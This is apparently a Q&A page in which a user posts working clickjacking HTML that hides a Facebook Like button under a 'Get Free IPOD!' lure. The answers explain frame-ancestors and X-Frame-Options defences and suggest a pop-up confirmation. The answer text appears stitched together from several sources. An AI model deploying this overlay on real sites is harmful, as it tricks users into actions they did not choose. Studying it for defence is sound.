Few days before I have read regarding clickjacking attack from http://javascript.info/tutorial/clickjacking . So today I tried with facebook like button. and It seems that i am successful in the experiment.
But i am not sure weather i am correct or not? This is the code snippet I have used.
<html>
<head>
<script>
window.fbAsyncInit = function() {
FB.init({
appId : '********',
xfbml : true,
version : 'v2.1'
});
};
(function(d, s, id){
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) {return;}
js = d.createElement(s); js.id = id;
js.src = "//connect.facebook.net/en_US/sdk.js";
fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));
</script>
<style>
iframe { /* iframe from facebook.com */
width:140px;
height:100px;
margin-top: 100px;
margin-left: 50px;
position:absolute;
top:0; left:0;
filter:alpha(opacity=50); /* in real life opacity=0 */
opacity:0.5;
}
.a{
margin-top: 95px;
}
</style>
</head>
<body>
<div class="a">
<a href="http://www.google.com" target="_blank" style="position:relative;left:20px;z-index:-1">Get Free IPOD!</a>
</div>
<iframe src="//www.facebook.com/plugins/like.php?href=https%3A%2F%2Fwww.facebook.com%2FTimesnow&width&layout=button&action=like&show_faces=false&share=false&height=35&appId=*****" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:35px;" allowTransparency="true"></iframe>
</body>
</html>
I can set the opacity of the iframe to 0 so that user can not see the fb like button when the user will click on the link , the attacker page will be automatically liked.
Example Fiddle: http://jsfiddle.net/5e5kvxk4/2/
Am I missing something? or facebook like button is really vulnerable ?
There are three main ways to prevent clickjacking: Sending the proper Content Security Policy (CSP) frame-ancestors directive response headers that instruct the browser to not allow framing from other domains. The older X-Frame-Options HTTP headers is used for graceful degradation and older browser compatibility.
When a user clicks the like button, the content appears in the News Feeds of that user's friends. The button also displays the number of users who liked each piece of content, and may show a full or partial list of those users.
Because clickjacking is a relatively new malicious technique, the damage caused by this vulnerability is not widely known.
View the HTML page in a browser and evaluate the page as follows: If the text “Website is vulnerable to clickjacking” appears and below it you see the content of your sensitive page, the page is vulnerable to clickjacking.
Yes, it probably is vulnerable to click jacking. There isn't a good solution to protect widgets from forged requests using current web technologies.
The widget will either be vulnerable to clickjacking or CSRF as explained here:
From "How to protect widgets from forged requests":
You don't want this [widget] to be vulnerable to CSRF so you write an iframe to the page. Based on the origin inheritance rules the parent site won't be able to read the CSRF token. However what about clickjacking (or likejacking )? Because of CSRF you must be within an iframe and there for the x-frame-options cannot help, and the same holds true for frame-busters
The best solution at present appears to be employing a pop up window in order to validate the click:
Clicking on the widget needs to open a pop-up window containing a new page -- an iframe is not good enough, it must be a new window -- which is entirely under the control of your web application. Confirm the action, whatever it is, on that page.
Yes, this is somewhat inelegant, but the present Web security architecture doesn't give you any better options.
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With